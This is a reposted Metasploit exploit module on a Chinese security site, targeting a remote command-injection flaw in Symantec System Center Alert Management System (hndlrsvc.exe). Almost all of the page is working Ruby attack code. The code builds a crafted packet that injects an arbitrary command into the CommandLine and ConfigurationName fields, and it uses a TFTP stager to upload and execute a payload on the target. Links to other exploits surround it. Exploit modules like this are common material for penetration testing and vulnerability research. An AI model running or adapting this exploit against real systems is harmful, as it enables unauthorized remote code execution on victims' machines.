首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command
来源:http://www.metasploit.com 作者:MC 发布时间:2011-08-22  

##
# $Id: ams_hndlrsvc.rb 13591 2011-08-19 18:35:29Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 Rank = ExcellentRanking

 include Msf::Exploit::CmdStagerTFTP
 include Msf::Exploit::Remote::Tcp

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
   'Description'    => %q{
     Symantec System Center Alert Management System is prone to a
    remote command-injection vulnerability because the application fails
    to properly sanitize user-supplied input.
   },
   'Author'         => [ 'MC' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 13591 $',
   'References'     =>
    [
     [ 'OSVDB', '66807'],
     [ 'BID', '41959' ],
     [ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
    ],
   'Targets'       =>
    [
     [ 'Windows Universal',
      {
       'Arch' => ARCH_X86,
       'Platform' => 'win'
      }
     ]
    ],
   'Privileged' => 'true',
   'Platform' => 'win',
   'DefaultTarget' => 0,
   'DisclosureDate' => 'Jul 26 2010'))

  register_options(
   [
    Opt::RPORT(38292),
    OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
   ], self.class)
 end

 def windows_stager

  exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

  print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
  execute_cmdstager({ :temp => '.'})
  @payload_exe = payload_exe

  print_status("Attempting to execute the payload...")
  execute_command(@payload_exe)

 end

 def execute_command(cmd, opts = {})
 
  connect

  if ( cmd.length > 128 )
   raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
  end

  string_uno  = Rex::Text.rand_text_alpha_upper(11)
  string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)

  packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
  packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
  packet << "\xe8\x03\x00\x00"
  packet << 'PRGXCNFG'
  packet << "\x10\x00\x00\x00"
  packet << "\x00\x00\x00\x00\x04"
  packet << 'ALHD\F'
  packet << "\x00\x00\x01\x00\x00"
  packet << "\x00\x01\x00\x0e\x00"
  packet << 'Risk Repaired'
  packet << "\x00\x25\x00"
  packet << 'Symantec Antivirus Corporate Edition'
  packet << "\x00\xf9\x1d\x13\x4a\x3f"
  packet << [string_uno.length + 1].pack('v') + string_uno
  packet << "\x00\x08\x08\x0a"
  packet << "\x00" + 'Risk Name'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00\x08\x0a\x00"
  packet << 'File Path'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00\x08\x11\x00"
  packet << 'Requested Action'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00\x08\x0e\x00"
  packet << 'Actual Action'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00\x08\x07\x00"
  packet << 'Logger'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00\x08\x05\x00"
  packet << 'User'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00\x08\x09\x00"
  packet << 'Hostname'
  packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
  packet << "\x00\x08\x13\x00"
  packet << 'Corrective Actions'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00\x00\x07\x08\x12\x00"
  packet << 'ConfigurationName'
  packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
  packet << "\x00" + cmd
  packet << "\x00\x08\x0c\x00"
  packet << 'CommandLine'
  packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
  packet << "\x00" + cmd
  packet << "\x00\x08\x08\x00"
  packet << 'RunArgs'
  packet << "\x00\x04\x00\x02\x00"
  packet << "\x20\x00\x03\x05\x00"
  packet << 'Mode'
  packet << "\x00\x04\x00\x02\x00\x00\x00"
  packet << "\x0a\x0d\x00"
  packet << 'FormatString'
  packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
  packet << 'ConfigurationName'
  packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
  packet << 'HandlerHost'
  packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
  packet << "\x00" + string_dos
  packet << "\x00" * packet.length

  sock.put(packet)
 
  select(nil,nil,nil,3) 
  disconnect
 end

 def exploit

  if not datastore['CMD'].empty?
   print_status("Executing command '#{datastore['CMD']}'")
   execute_command(datastore['CMD'])
   return
  end

  case target['Platform']
   when 'win'
    windows_stager
   else
    raise RuntimeError, 'Target not supported.'
   end

  handler

 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec System Center Alert M
·XlightFTP Server v3.7.0 Remote
·HP Easy Printer Care XMLSimple
·iPhone Safari Remote Crash
·Apache httpd Remote Denial of
·Zen Media Player (.pls) Local
·Apache Struts < 2.2.0 Remote C
·Opera Web Browser 11.50 DoS
·Solarftp v2.1.2 PASV buffer ov
·IE for Windowse Mobile Denial
·WAR-FTP Remote Buffer Overflow
·Contrexx Shopsystem Blind SQL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved